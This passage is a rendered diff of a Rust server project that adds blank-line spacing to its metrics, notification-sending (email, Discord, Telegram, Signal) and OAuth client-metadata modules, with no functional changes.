request.method().to_string(); 94 let path = normalize_path(request.uri().path()); 95 + 96 let response = next.run(request).await; 97 + 98 let duration = start.elapsed().as_secs_f64(); 99 let status = response.status().as_u16().to_string(); 100 + 101 counter!( 102 "bspds_http_requests_total", 103 "method" => method.clone(), ··· 105 "status" => status.clone() 106 ) 107 .increment(1); 108 + 109 histogram!( 110 "bspds_http_request_duration_seconds", 111 "method" => method, 112 "path" => path 113 ) 114 .record(duration); 115 + 116 response 117 } 118 + 119 fn normalize_path(path: &str) -> String { 120 if path.starts_with("/xrpc/") { 121 if let Some(method) = path.strip_prefix("/xrpc/") { ··· 125 return path.to_string(); 126 } 127 } 128 + 129 if path.starts_with("/u/") && path.ends_with("/did.json") { 130 return "/u/{handle}/did.json".to_string(); 131 } 132 + 133 if path.starts_with("/oauth/") { 134 return path.to_string(); 135 } 136 + 137 path.to_string() 138 } 139 + 140 pub fn record_auth_cache_hit(cache_type: &str) { 141 counter!("bspds_auth_cache_hits_total", "cache_type" => cache_type.to_string()).increment(1); 142 } 143 + 144 pub fn record_auth_cache_miss(cache_type: &str) { 145 counter!("bspds_auth_cache_misses_total", "cache_type" => cache_type.to_string()).increment(1); 146 } 147 + 148 pub fn set_firehose_subscribers(count: usize) { 149 gauge!("bspds_firehose_subscribers").set(count as f64); 150 } 151 + 152 pub fn increment_firehose_subscribers() { 153 counter!("bspds_firehose_events_total").increment(1); 154 } 155 + 156 pub fn record_firehose_event() { 157 counter!("bspds_firehose_events_total").increment(1); 158 } 159 + 160 pub fn record_block_operation(op_type: &str) { 161 counter!("bspds_block_operations_total", "op_type" => op_type.to_string()).increment(1); 162 } 163 + 164 pub fn record_s3_operation(op_type: &str, status: &str) { 165 counter!( 166 "bspds_s3_operations_total", ··· 169 ) 170 .increment(1); 171 } 172 + 173 pub fn set_notification_queue_size(size: usize) { 174 gauge!("bspds_notification_queue_size").set(size as f64); 175 } 176 + 177 pub fn record_rate_limit_rejection(limiter: &str) { 178 counter!("bspds_rate_limit_rejections_total", "limiter" => limiter.to_string()).increment(1); 179 } 180 + 181 pub fn record_db_query(query_type: &str, duration_seconds: f64) { 182 counter!("bspds_db_queries_total", "query_type" => query_type.to_string()).increment(1); 183 histogram!( ··· 186 ) 187 .record(duration_seconds); 188 } 189 + 190 #[cfg(test)] 191 mod tests { 192 use super::*; 193 + 194 #[test] 195 fn test_normalize_path() { 196 assert_eq!(
+3
src/notifications/mod.rs
··· 1 mod sender; 2 mod service; 3 mod types; 4 pub use sender::{ 5 DiscordSender, EmailSender, NotificationSender, SendError, SignalSender, TelegramSender, 6 is_valid_phone_number, sanitize_header_value, 7 }; 8 pub use service::{ 9 channel_display_name, enqueue_2fa_code, enqueue_account_deletion, enqueue_email_update, 10 enqueue_email_verification, enqueue_notification, enqueue_password_reset, 11 enqueue_plc_operation, enqueue_signup_verification, enqueue_welcome, NotificationService, 12 }; 13 pub use types::{ 14 NewNotification, NotificationChannel, NotificationStatus, NotificationType, QueuedNotification, 15 };
··· 1 mod sender; 2 mod service; 3 mod types; 4 + 5 pub use sender::{ 6 DiscordSender, EmailSender, NotificationSender, SendError, SignalSender, TelegramSender, 7 is_valid_phone_number, sanitize_header_value, 8 }; 9 + 10 pub use service::{ 11 channel_display_name, enqueue_2fa_code, enqueue_account_deletion, enqueue_email_update, 12 enqueue_email_verification, enqueue_notification, enqueue_password_reset, 13 enqueue_plc_operation, enqueue_signup_verification, enqueue_welcome, NotificationService, 14 }; 15 + 16 pub use types::{ 17 NewNotification, NotificationChannel, NotificationStatus, NotificationType, QueuedNotification, 18 };
+30
src/notifications/sender.rs
··· 5 use std::time::Duration; 6 use tokio::io::AsyncWriteExt; 7 use tokio::process::Command; 8 use super::types::{NotificationChannel, QueuedNotification}; 9 const HTTP_TIMEOUT_SECS: u64 = 30; 10 const MAX_RETRIES: u32 = 3; 11 const INITIAL_RETRY_DELAY_MS: u64 = 500; 12 #[async_trait] 13 pub trait NotificationSender: Send + Sync { 14 fn channel(&self) -> NotificationChannel; 15 async fn send(&self, notification: &QueuedNotification) -> Result<(), SendError>; 16 } 17 #[derive(Debug, thiserror::Error)] 18 pub enum SendError { 19 #[error("Failed to spawn sendmail process: {0}")] ··· 31 #[error("Max retries exceeded: {0}")] 32 MaxRetriesExceeded(String), 33 } 34 fn create_http_client() -> Client { 35 Client::builder() 36 .timeout(Duration::from_secs(HTTP_TIMEOUT_SECS)) ··· 38 .build() 39 .unwrap_or_else(|_| Client::new()) 40 } 41 fn is_retryable_status(status: reqwest::StatusCode) -> bool { 42 status.is_server_error() || status == reqwest::StatusCode::TOO_MANY_REQUESTS 43 } 44 async fn retry_delay(attempt: u32) { 45 let delay_ms = INITIAL_RETRY_DELAY_MS * 2u64.pow(attempt); 46 tokio::time::sleep(Duration::from_millis(delay_ms)).await; 47 } 48 pub fn sanitize_header_value(value: &str) -> String { 49 value.replace(['\r', '\n'], " ").trim().to_string() 50 } 51 pub fn is_valid_phone_number(number: &str) -> bool { 52 if number.len() < 2 || number.len() > 20 { 53 return false; ··· 59 let remaining: String = chars.collect(); 60 !remaining.is_empty() && remaining.chars().all(|c| c.is_ascii_digit()) 61 } 62 pub struct EmailSender { 63 from_address: String, 64 from_name: String, 65 sendmail_path: String, 66 } 67 impl EmailSender { 68 pub fn new(from_address: String, from_name: String) -> Self { 69 Self { ··· 72 sendmail_path: std::env::var("SENDMAIL_PATH").unwrap_or_else(|_| "/usr/sbin/sendmail".to_string()), 73 } 74 } 75 pub fn from_env() -> Option<Self> { 76 let from_address = std::env::var("MAIL_FROM_ADDRESS").ok()?; 77 let from_name = std::env::var("MAIL_FROM_NAME").unwrap_or_else(|_| "BSPDS".to_string()); 78 Some(Self::new(from_address, from_name)) 79 } 80 pub fn format_email(&self, notification: &QueuedNotification) -> String { 81 let subject = sanitize_header_value(notification.subject.as_deref().unwrap_or("Notification")); 82 let recipient = sanitize_header_value(&notification.recipient); ··· 94 ) 95 } 96 } 97 #[async_trait] 98 impl NotificationSender for EmailSender { 99 fn channel(&self) -> NotificationChannel { 100 NotificationChannel::Email 101 } 102 async fn send(&self, notification: &QueuedNotification) -> Result<(), SendError> { 103 let email_content = self.format_email(notification); 104 let mut child = Command::new(&self.sendmail_path) ··· 119 Ok(()) 120 } 121 } 122 pub struct DiscordSender { 123 webhook_url: String, 124 http_client: Client, 125 } 126 impl DiscordSender { 127 pub fn new(webhook_url: String) -> Self { 128 Self { ··· 130 http_client: create_http_client(), 131 } 132 } 133 pub fn from_env() -> Option<Self> { 134 let webhook_url = std::env::var("DISCORD_WEBHOOK_URL").ok()?; 135 Some(Self::new(webhook_url)) 136 } 137 } 138 #[async_trait] 139 impl NotificationSender for DiscordSender { 140 fn channel(&self) -> NotificationChannel { 141 NotificationChannel::Discord 142 } 143 async fn send(&self, notification: &QueuedNotification) -> Result<(), SendError> { 144 let subject = notification.subject.as_deref().unwrap_or("Notification"); 145 let content = format!("**{}**\n\n{}", subject, notification.body); ··· 193 )) 194 } 195 } 196 pub struct TelegramSender { 197 bot_token: String, 198 http_client: Client, 199 } 200 impl TelegramSender { 201 pub fn new(bot_token: String) -> Self { 202 Self { ··· 204 http_client: create_http_client(), 205 } 206 } 207 pub fn from_env() -> Option<Self> { 208 let bot_token = std::env::var("TELEGRAM_BOT_TOKEN").ok()?; 209 Some(Self::new(bot_token)) 210 } 211 } 212 #[async_trait] 213 impl NotificationSender for TelegramSender { 214 fn channel(&self) -> NotificationChannel { 215 NotificationChannel::Telegram 216 } 217 async fn send(&self, notification: &QueuedNotification) -> Result<(), SendError> { 218 let chat_id = &notification.recipient; 219 let subject = notification.subject.as_deref().unwrap_or("Notification"); ··· 273 )) 274 } 275 } 276 pub struct SignalSender { 277 signal_cli_path: String, 278 sender_number: String, 279 } 280 impl SignalSender { 281 pub fn new(signal_cli_path: String, sender_number: String) -> Self { 282 Self { ··· 284 sender_number, 285 } 286 } 287 pub fn from_env() -> Option<Self> { 288 let signal_cli_path = std::env::var("SIGNAL_CLI_PATH") 289 .unwrap_or_else(|_| "/usr/local/bin/signal-cli".to_string()); ··· 291 Some(Self::new(signal_cli_path, sender_number)) 292 } 293 } 294 #[async_trait] 295 impl NotificationSender for SignalSender { 296 fn channel(&self) -> NotificationChannel { 297 NotificationChannel::Signal 298 } 299 async fn send(&self, notification: &QueuedNotification) -> Result<(), SendError> { 300 let recipient = &notification.recipient; 301 if !is_valid_phone_number(recipient) {
··· 5 use std::time::Duration; 6 use tokio::io::AsyncWriteExt; 7 use tokio::process::Command; 8 + 9 use super::types::{NotificationChannel, QueuedNotification}; 10 + 11 const HTTP_TIMEOUT_SECS: u64 = 30; 12 const MAX_RETRIES: u32 = 3; 13 const INITIAL_RETRY_DELAY_MS: u64 = 500; 14 + 15 #[async_trait] 16 pub trait NotificationSender: Send + Sync { 17 fn channel(&self) -> NotificationChannel; 18 async fn send(&self, notification: &QueuedNotification) -> Result<(), SendError>; 19 } 20 + 21 #[derive(Debug, thiserror::Error)] 22 pub enum SendError { 23 #[error("Failed to spawn sendmail process: {0}")] ··· 35 #[error("Max retries exceeded: {0}")] 36 MaxRetriesExceeded(String), 37 } 38 + 39 fn create_http_client() -> Client { 40 Client::builder() 41 .timeout(Duration::from_secs(HTTP_TIMEOUT_SECS)) ··· 43 .build() 44 .unwrap_or_else(|_| Client::new()) 45 } 46 + 47 fn is_retryable_status(status: reqwest::StatusCode) -> bool { 48 status.is_server_error() || status == reqwest::StatusCode::TOO_MANY_REQUESTS 49 } 50 + 51 async fn retry_delay(attempt: u32) { 52 let delay_ms = INITIAL_RETRY_DELAY_MS * 2u64.pow(attempt); 53 tokio::time::sleep(Duration::from_millis(delay_ms)).await; 54 } 55 + 56 pub fn sanitize_header_value(value: &str) -> String { 57 value.replace(['\r', '\n'], " ").trim().to_string() 58 } 59 + 60 pub fn is_valid_phone_number(number: &str) -> bool { 61 if number.len() < 2 || number.len() > 20 { 62 return false; ··· 68 let remaining: String = chars.collect(); 69 !remaining.is_empty() && remaining.chars().all(|c| c.is_ascii_digit()) 70 } 71 + 72 pub struct EmailSender { 73 from_address: String, 74 from_name: String, 75 sendmail_path: String, 76 } 77 + 78 impl EmailSender { 79 pub fn new(from_address: String, from_name: String) -> Self { 80 Self { ··· 83 sendmail_path: std::env::var("SENDMAIL_PATH").unwrap_or_else(|_| "/usr/sbin/sendmail".to_string()), 84 } 85 } 86 + 87 pub fn from_env() -> Option<Self> { 88 let from_address = std::env::var("MAIL_FROM_ADDRESS").ok()?; 89 let from_name = std::env::var("MAIL_FROM_NAME").unwrap_or_else(|_| "BSPDS".to_string()); 90 Some(Self::new(from_address, from_name)) 91 } 92 + 93 pub fn format_email(&self, notification: &QueuedNotification) -> String { 94 let subject = sanitize_header_value(notification.subject.as_deref().unwrap_or("Notification")); 95 let recipient = sanitize_header_value(&notification.recipient); ··· 107 ) 108 } 109 } 110 + 111 #[async_trait] 112 impl NotificationSender for EmailSender { 113 fn channel(&self) -> NotificationChannel { 114 NotificationChannel::Email 115 } 116 + 117 async fn send(&self, notification: &QueuedNotification) -> Result<(), SendError> { 118 let email_content = self.format_email(notification); 119 let mut child = Command::new(&self.sendmail_path) ··· 134 Ok(()) 135 } 136 } 137 + 138 pub struct DiscordSender { 139 webhook_url: String, 140 http_client: Client, 141 } 142 + 143 impl DiscordSender { 144 pub fn new(webhook_url: String) -> Self { 145 Self { ··· 147 http_client: create_http_client(), 148 } 149 } 150 + 151 pub fn from_env() -> Option<Self> { 152 let webhook_url = std::env::var("DISCORD_WEBHOOK_URL").ok()?; 153 Some(Self::new(webhook_url)) 154 } 155 } 156 + 157 #[async_trait] 158 impl NotificationSender for DiscordSender { 159 fn channel(&self) -> NotificationChannel { 160 NotificationChannel::Discord 161 } 162 + 163 async fn send(&self, notification: &QueuedNotification) -> Result<(), SendError> { 164 let subject = notification.subject.as_deref().unwrap_or("Notification"); 165 let content = format!("**{}**\n\n{}", subject, notification.body); ··· 213 )) 214 } 215 } 216 + 217 pub struct TelegramSender { 218 bot_token: String, 219 http_client: Client, 220 } 221 + 222 impl TelegramSender { 223 pub fn new(bot_token: String) -> Self { 224 Self { ··· 226 http_client: create_http_client(), 227 } 228 } 229 + 230 pub fn from_env() -> Option<Self> { 231 let bot_token = std::env::var("TELEGRAM_BOT_TOKEN").ok()?; 232 Some(Self::new(bot_token)) 233 } 234 } 235 + 236 #[async_trait] 237 impl NotificationSender for TelegramSender { 238 fn channel(&self) -> NotificationChannel { 239 NotificationChannel::Telegram 240 } 241 + 242 async fn send(&self, notification: &QueuedNotification) -> Result<(), SendError> { 243 let chat_id = &notification.recipient; 244 let subject = notification.subject.as_deref().unwrap_or("Notification"); ··· 298 )) 299 } 300 } 301 + 302 pub struct SignalSender { 303 signal_cli_path: String, 304 sender_number: String, 305 } 306 + 307 impl SignalSender { 308 pub fn new(signal_cli_path: String, sender_number: String) -> Self { 309 Self { ··· 311 sender_number, 312 } 313 } 314 + 315 pub fn from_env() -> Option<Self> { 316 let signal_cli_path = std::env::var("SIGNAL_CLI_PATH") 317 .unwrap_or_else(|_| "/usr/local/bin/signal-cli".to_string()); ··· 319 Some(Self::new(signal_cli_path, sender_number)) 320 } 321 } 322 + 323 #[async_trait] 324 impl NotificationSender for SignalSender { 325 fn channel(&self) -> NotificationChannel { 326 NotificationChannel::Signal 327 } 328 + 329 async fn send(&self, notification: &QueuedNotification) -> Result<(), SendError> { 330 let recipient = &notification.recipient; 331 if !is_valid_phone_number(recipient) {
+27
src/notifications/service.rs
··· 1 use std::collections::HashMap; 2 use std::sync::Arc; 3 use std::time::Duration; 4 use chrono::Utc; 5 use sqlx::PgPool; 6 use tokio::sync::watch; 7 use tokio::time::interval; 8 use tracing::{debug, error, info, warn}; 9 use uuid::Uuid; 10 use super::sender::{NotificationSender, SendError}; 11 use super::types::{NewNotification, NotificationChannel, NotificationStatus, QueuedNotification}; 12 pub struct NotificationService { 13 db: PgPool, 14 senders: HashMap<NotificationChannel, Arc<dyn NotificationSender>>, 15 poll_interval: Duration, 16 batch_size: i64, 17 } 18 impl NotificationService { 19 pub fn new(db: PgPool) -> Self { 20 let poll_interval_ms: u64 = std::env::var("NOTIFICATION_POLL_INTERVAL_MS") ··· 32 batch_size, 33 } 34 } 35 pub fn with_poll_interval(mut self, interval: Duration) -> Self { 36 self.poll_interval = interval; 37 self 38 } 39 pub fn with_batch_size(mut self, size: i64) -> Self { 40 self.batch_size = size; 41 self 42 } 43 pub fn register_sender<S: NotificationSender + 'static>(mut self, sender: S) -> Self { 44 self.senders.insert(sender.channel(), Arc::new(sender)); 45 self 46 } 47 pub async fn enqueue(&self, notification: NewNotification) -> Result<Uuid, sqlx::Error> { 48 let id = sqlx::query_scalar!( 49 r#" ··· 65 debug!(notification_id = %id, "Notification enqueued"); 66 Ok(id) 67 } 68 pub fn has_senders(&self) -> bool { 69 !self.senders.is_empty() 70 } 71 pub async fn run(self, mut shutdown: watch::Receiver<bool>) { 72 if self.senders.is_empty() { 73 warn!("Notification service starting with no senders configured. Notifications will be queued but not delivered until senders are configured."); ··· 95 } 96 } 97 } 98 async fn process_batch(&self) -> Result<(), sqlx::Error> { 99 let notifications = self.fetch_pending_notifications().await?; 100 if notifications.is_empty() { ··· 106 } 107 Ok(()) 108 } 109 async fn fetch_pending_notifications(&self) -> Result<Vec<QueuedNotification>, sqlx::Error> { 110 let now = Utc::now(); 111 sqlx::query_as!( ··· 137 .fetch_all(&self.db) 138 .await 139 } 140 async fn process_notification(&self, notification: QueuedNotification) { 141 let notification_id = notification.id; 142 let channel = notification.channel; ··· 179 } 180 } 181 } 182 async fn mark_sent(&self, id: Uuid) -> Result<(), sqlx::Error> { 183 sqlx::query!( 184 r#" ··· 192 .await?; 193 Ok(()) 194 } 195 async fn mark_failed(&self, id: Uuid, error: &str) -> Result<(), sqlx::Error> { 196 sqlx::query!( 197 r#" ··· 215 Ok(()) 216 } 217 } 218 pub async fn enqueue_notification(db: &PgPool, notification: NewNotification) -> Result<Uuid, sqlx::Error> { 219 sqlx::query_scalar!( 220 r#" ··· 234 .fetch_one(db) 235 .await 236 } 237 pub struct UserNotificationPrefs { 238 pub channel: NotificationChannel, 239 pub email: Option<String>, 240 pub handle: String, 241 } 242 pub async fn get_user_notification_prefs( 243 db: &PgPool, 244 user_id: Uuid, ··· 262 handle: row.handle, 263 }) 264 } 265 pub async fn enqueue_welcome( 266 db: &PgPool, 267 user_id: Uuid, ··· 285 ) 286 .await 287 } 288 pub async fn enqueue_email_verification( 289 db: &PgPool, 290 user_id: Uuid, ··· 309 ) 310 .await 311 } 312 pub async fn enqueue_password_reset( 313 db: &PgPool, 314 user_id: Uuid, ··· 333 ) 334 .await 335 } 336 pub async fn enqueue_email_update( 337 db: &PgPool, 338 user_id: Uuid, ··· 357 ) 358 .await 359 } 360 pub async fn enqueue_account_deletion( 361 db: &PgPool, 362 user_id: Uuid, ··· 381 ) 382 .await 383 } 384 pub async fn enqueue_plc_operation( 385 db: &PgPool, 386 user_id: Uuid, ··· 405 ) 406 .await 407 } 408 pub async fn enqueue_2fa_code( 409 db: &PgPool, 410 user_id: Uuid, ··· 429 ) 430 .await 431 } 432 pub fn channel_display_name(channel: NotificationChannel) -> &'static str { 433 match channel { 434 NotificationChannel::Email => "email", ··· 437 NotificationChannel::Signal => "Signal", 438 } 439 } 440 pub async fn enqueue_signup_verification( 441 db: &PgPool, 442 user_id: Uuid,
··· 1 use std::collections::HashMap; 2 use std::sync::Arc; 3 use std::time::Duration; 4 + 5 use chrono::Utc; 6 use sqlx::PgPool; 7 use tokio::sync::watch; 8 use tokio::time::interval; 9 use tracing::{debug, error, info, warn}; 10 use uuid::Uuid; 11 + 12 use super::sender::{NotificationSender, SendError}; 13 use super::types::{NewNotification, NotificationChannel, NotificationStatus, QueuedNotification}; 14 + 15 pub struct NotificationService { 16 db: PgPool, 17 senders: HashMap<NotificationChannel, Arc<dyn NotificationSender>>, 18 poll_interval: Duration, 19 batch_size: i64, 20 } 21 + 22 impl NotificationService { 23 pub fn new(db: PgPool) -> Self { 24 let poll_interval_ms: u64 = std::env::var("NOTIFICATION_POLL_INTERVAL_MS") ··· 36 batch_size, 37 } 38 } 39 + 40 pub fn with_poll_interval(mut self, interval: Duration) -> Self { 41 self.poll_interval = interval; 42 self 43 } 44 + 45 pub fn with_batch_size(mut self, size: i64) -> Self { 46 self.batch_size = size; 47 self 48 } 49 + 50 pub fn register_sender<S: NotificationSender + 'static>(mut self, sender: S) -> Self { 51 self.senders.insert(sender.channel(), Arc::new(sender)); 52 self 53 } 54 + 55 pub async fn enqueue(&self, notification: NewNotification) -> Result<Uuid, sqlx::Error> { 56 let id = sqlx::query_scalar!( 57 r#" ··· 73 debug!(notification_id = %id, "Notification enqueued"); 74 Ok(id) 75 } 76 + 77 pub fn has_senders(&self) -> bool { 78 !self.senders.is_empty() 79 } 80 + 81 pub async fn run(self, mut shutdown: watch::Receiver<bool>) { 82 if self.senders.is_empty() { 83 warn!("Notification service starting with no senders configured. Notifications will be queued but not delivered until senders are configured."); ··· 105 } 106 } 107 } 108 + 109 async fn process_batch(&self) -> Result<(), sqlx::Error> { 110 let notifications = self.fetch_pending_notifications().await?; 111 if notifications.is_empty() { ··· 117 } 118 Ok(()) 119 } 120 + 121 async fn fetch_pending_notifications(&self) -> Result<Vec<QueuedNotification>, sqlx::Error> { 122 let now = Utc::now(); 123 sqlx::query_as!( ··· 149 .fetch_all(&self.db) 150 .await 151 } 152 + 153 async fn process_notification(&self, notification: QueuedNotification) { 154 let notification_id = notification.id; 155 let channel = notification.channel; ··· 192 } 193 } 194 } 195 + 196 async fn mark_sent(&self, id: Uuid) -> Result<(), sqlx::Error> { 197 sqlx::query!( 198 r#" ··· 206 .await?; 207 Ok(()) 208 } 209 + 210 async fn mark_failed(&self, id: Uuid, error: &str) -> Result<(), sqlx::Error> { 211 sqlx::query!( 212 r#" ··· 230 Ok(()) 231 } 232 } 233 + 234 pub async fn enqueue_notification(db: &PgPool, notification: NewNotification) -> Result<Uuid, sqlx::Error> { 235 sqlx::query_scalar!( 236 r#" ··· 250 .fetch_one(db) 251 .await 252 } 253 + 254 pub struct UserNotificationPrefs { 255 pub channel: NotificationChannel, 256 pub email: Option<String>, 257 pub handle: String, 258 } 259 + 260 pub async fn get_user_notification_prefs( 261 db: &PgPool, 262 user_id: Uuid, ··· 280 handle: row.handle, 281 }) 282 } 283 + 284 pub async fn enqueue_welcome( 285 db: &PgPool, 286 user_id: Uuid, ··· 304 ) 305 .await 306 } 307 + 308 pub async fn enqueue_email_verification( 309 db: &PgPool, 310 user_id: Uuid, ··· 329 ) 330 .await 331 } 332 + 333 pub async fn enqueue_password_reset( 334 db: &PgPool, 335 user_id: Uuid, ··· 354 ) 355 .await 356 } 357 + 358 pub async fn enqueue_email_update( 359 db: &PgPool, 360 user_id: Uuid, ··· 379 ) 380 .await 381 } 382 + 383 pub async fn enqueue_account_deletion( 384 db: &PgPool, 385 user_id: Uuid, ··· 404 ) 405 .await 406 } 407 + 408 pub async fn enqueue_plc_operation( 409 db: &PgPool, 410 user_id: Uuid, ··· 429 ) 430 .await 431 } 432 + 433 pub async fn enqueue_2fa_code( 434 db: &PgPool, 435 user_id: Uuid, ··· 454 ) 455 .await 456 } 457 + 458 pub fn channel_display_name(channel: NotificationChannel) -> &'static str { 459 match channel { 460 NotificationChannel::Email => "email", ··· 463 NotificationChannel::Signal => "Signal", 464 } 465 } 466 + 467 pub async fn enqueue_signup_verification( 468 db: &PgPool, 469 user_id: Uuid,
+7
src/notifications/types.rs
··· 2 use serde::{Deserialize, Serialize}; 3 use sqlx::FromRow; 4 use uuid::Uuid; 5 #[derive(Debug, Clone, Copy, PartialEq, Eq, Hash, sqlx::Type, Serialize, Deserialize)] 6 #[sqlx(type_name = "notification_channel", rename_all = "lowercase")] 7 pub enum NotificationChannel { ··· 10 Telegram, 11 Signal, 12 } 13 #[derive(Debug, Clone, Copy, PartialEq, Eq, sqlx::Type, Serialize, Deserialize)] 14 #[sqlx(type_name = "notification_status", rename_all = "lowercase")] 15 pub enum NotificationStatus { ··· 18 Sent, 19 Failed, 20 } 21 #[derive(Debug, Clone, Copy, PartialEq, Eq, sqlx::Type, Serialize, Deserialize)] 22 #[sqlx(type_name = "notification_type", rename_all = "snake_case")] 23 pub enum NotificationType { ··· 30 PlcOperation, 31 TwoFactorCode, 32 } 33 #[derive(Debug, Clone, FromRow)] 34 pub struct QueuedNotification { 35 pub id: Uuid, ··· 49 pub scheduled_for: DateTime<Utc>, 50 pub processed_at: Option<DateTime<Utc>>, 51 } 52 pub struct NewNotification { 53 pub user_id: Uuid, 54 pub channel: NotificationChannel, ··· 58 pub body: String, 59 pub metadata: Option<serde_json::Value>, 60 } 61 impl NewNotification { 62 pub fn new( 63 user_id: Uuid, ··· 77 metadata: None, 78 } 79 } 80 pub fn email( 81 user_id: Uuid, 82 notification_type: NotificationType,
··· 2 use serde::{Deserialize, Serialize}; 3 use sqlx::FromRow; 4 use uuid::Uuid; 5 + 6 #[derive(Debug, Clone, Copy, PartialEq, Eq, Hash, sqlx::Type, Serialize, Deserialize)] 7 #[sqlx(type_name = "notification_channel", rename_all = "lowercase")] 8 pub enum NotificationChannel { ··· 11 Telegram, 12 Signal, 13 } 14 + 15 #[derive(Debug, Clone, Copy, PartialEq, Eq, sqlx::Type, Serialize, Deserialize)] 16 #[sqlx(type_name = "notification_status", rename_all = "lowercase")] 17 pub enum NotificationStatus { ··· 20 Sent, 21 Failed, 22 } 23 + 24 #[derive(Debug, Clone, Copy, PartialEq, Eq, sqlx::Type, Serialize, Deserialize)] 25 #[sqlx(type_name = "notification_type", rename_all = "snake_case")] 26 pub enum NotificationType { ··· 33 PlcOperation, 34 TwoFactorCode, 35 } 36 + 37 #[derive(Debug, Clone, FromRow)] 38 pub struct QueuedNotification { 39 pub id: Uuid, ··· 53 pub scheduled_for: DateTime<Utc>, 54 pub processed_at: Option<DateTime<Utc>>, 55 } 56 + 57 pub struct NewNotification { 58 pub user_id: Uuid, 59 pub channel: NotificationChannel, ··· 63 pub body: String, 64 pub metadata: Option<serde_json::Value>, 65 } 66 + 67 impl NewNotification { 68 pub fn new( 69 user_id: Uuid, ··· 83 metadata: None, 84 } 85 } 86 + 87 pub fn email( 88 user_id: Uuid, 89 notification_type: NotificationType,
+22
src/oauth/client.rs
··· 3 use std::collections::HashMap; 4 use std::sync::Arc; 5 use tokio::sync::RwLock; 6 use super::OAuthError; 7 #[derive(Debug, Clone, Serialize, Deserialize)] 8 pub struct ClientMetadata { 9 pub client_id: String, ··· 31 #[serde(skip_serializing_if = "Option::is_none")] 32 pub application_type: Option<String>, 33 } 34 impl Default for ClientMetadata { 35 fn default() -> Self { 36 Self { ··· 50 } 51 } 52 } 53 #[derive(Clone)] 54 pub struct ClientMetadataCache { 55 cache: Arc<RwLock<HashMap<String, CachedMetadata>>>, ··· 57 http_client: Client, 58 cache_ttl_secs: u64, 59 } 60 struct CachedMetadata { 61 metadata: ClientMetadata, 62 cached_at: std::time::Instant, 63 } 64 struct CachedJwks { 65 jwks: serde_json::Value, 66 cached_at: std::time::Instant, 67 } 68 impl ClientMetadataCache { 69 pub fn new(cache_ttl_secs: u64) -> Self { 70 Self { ··· 78 cache_ttl_secs, 79 } 80 } 81 pub async fn get(&self, client_id: &str) -> Result<ClientMetadata, OAuthError> { 82 { 83 let cache = self.cache.read().await; ··· 100 } 101 Ok(metadata) 102 } 103 pub async fn get_jwks(&self, metadata: &ClientMetadata) -> Result<serde_json::Value, OAuthError> { 104 if let Some(jwks) = &metadata.jwks { 105 return Ok(jwks.clone()); ··· 130 } 131 Ok(jwks) 132 } 133 async fn fetch_jwks(&self, jwks_uri: &str) -> Result<serde_json::Value, OAuthError> { 134 if !jwks_uri.starts_with("https://") { 135 if !jwks_uri.starts_with("http://") ··· 166 } 167 Ok(jwks) 168 } 169 async fn fetch_metadata(&self, client_id: &str) -> Result<ClientMetadata, OAuthError> { 170 if !client_id.starts_with("http://") && !client_id.starts_with("https://") { 171 return Err(OAuthError::InvalidClient( ··· 207 self.validate_metadata(&metadata)?; 208 Ok(metadata) 209 } 210 fn validate_metadata(&self, metadata: &ClientMetadata) -> Result<(), OAuthError> { 211 if metadata.redirect_uris.is_empty() { 212 return Err(OAuthError::InvalidClient( ··· 232 } 233 Ok(()) 234 } 235 pub fn validate_redirect_uri( 236 &self, 237 metadata: &ClientMetadata, ··· 244 } 245 Ok(()) 246 } 247 fn validate_redirect_uri_format(&self, uri: &str) -> Result<(), OAuthError> { 248 if uri.contains('#') { 249 return Err(OAuthError::InvalidClient( ··· 278 Ok(()) 279 } 280 } 281 impl ClientMetadata { 282 pub fn requires_dpop(&self) -> bool { 283 self.dpop_bound_access_tokens.unwrap_or(false) 284 } 285 pub fn auth_method(&self) -> &str { 286 self.token_endpoint_auth_method 287 .as_deref() 288 .unwrap_or("none") 289 } 290 } 291 pub async fn verify_client_auth( 292 cache: &ClientMetadataCache, 293 metadata: &ClientMetadata, ··· 321 ))), 322 } 323 } 324 async fn verify_private_key_jwt_async( 325 cache: &ClientMetadataCache, 326 metadata: &ClientMetadata, ··· 425 "client_assertion signature verification failed".to_string(), 426 )) 427 } 428 fn verify_es256( 429 key: &serde_json::Value, 430 signing_input: &str, ··· 456 .verify(signing_input.as_bytes(), &sig) 457 .map_err(|_| OAuthError::InvalidClient("ES256 signature verification failed".to_string())) 458 } 459 fn verify_es384( 460 key: &serde_json::Value, 461 signing_input: &str, ··· 487 .verify(signing_input.as_bytes(), &sig) 488 .map_err(|_| OAuthError::InvalidClient("ES384 signature verification failed".to_string())) 489 } 490 fn verify_rsa( 491 _alg: &str, 492 _key: &serde_json::Value, ··· 497 "RSA signature verification not yet supported - use EC keys".to_string(), 498 )) 499 } 500 fn verify_eddsa( 501 key: &serde_json::Value, 502 signing_input: &str,
··· 3 use std::collections::HashMap; 4 use std::sync::Arc; 5 use tokio::sync::RwLock; 6 + 7 use super::OAuthError; 8 + 9 #[derive(Debug, Clone, Serialize, Deserialize)] 10 pub struct ClientMetadata { 11 pub client_id: String, ··· 33 #[serde(skip_serializing_if = "Option::is_none")] 34 pub application_type: Option<String>, 35 } 36 + 37 impl Default for ClientMetadata { 38 fn default() -> Self { 39 Self { ··· 53 } 54 } 55 } 56 + 57 #[derive(Clone)] 58 pub struct ClientMetadataCache { 59 cache: Arc<RwLock<HashMap<String, CachedMetadata>>>, ··· 61 http_client: Client, 62 cache_ttl_secs: u64, 63 } 64 + 65 struct CachedMetadata { 66 metadata: ClientMetadata, 67 cached_at: std::time::Instant, 68 } 69 + 70 struct CachedJwks { 71 jwks: serde_json::Value, 72 cached_at: std::time::Instant, 73 } 74 + 75 impl ClientMetadataCache { 76 pub fn new(cache_ttl_secs: u64) -> Self { 77 Self { ··· 85 cache_ttl_secs, 86 } 87 } 88 + 89 pub async fn get(&self, client_id: &str) -> Result<ClientMetadata, OAuthError> { 90 { 91 let cache = self.cache.read().await; ··· 108 } 109 Ok(metadata) 110 } 111 + 112 pub async fn get_jwks(&self, metadata: &ClientMetadata) -> Result<serde_json::Value, OAuthError> { 113 if let Some(jwks) = &metadata.jwks { 114 return Ok(jwks.clone()); ··· 139 } 140 Ok(jwks) 141 } 142 + 143 async fn fetch_jwks(&self, jwks_uri: &str) -> Result<serde_json::Value, OAuthError> { 144 if !jwks_uri.starts_with("https://") { 145 if !jwks_uri.starts_with("http://") ··· 176 } 177 Ok(jwks) 178 } 179 + 180 async fn fetch_metadata(&self, client_id: &str) -> Result<ClientMetadata, OAuthError> { 181 if !client_id.starts_with("http://") && !client_id.starts_with("https://") { 182 return Err(OAuthError::InvalidClient( ··· 218 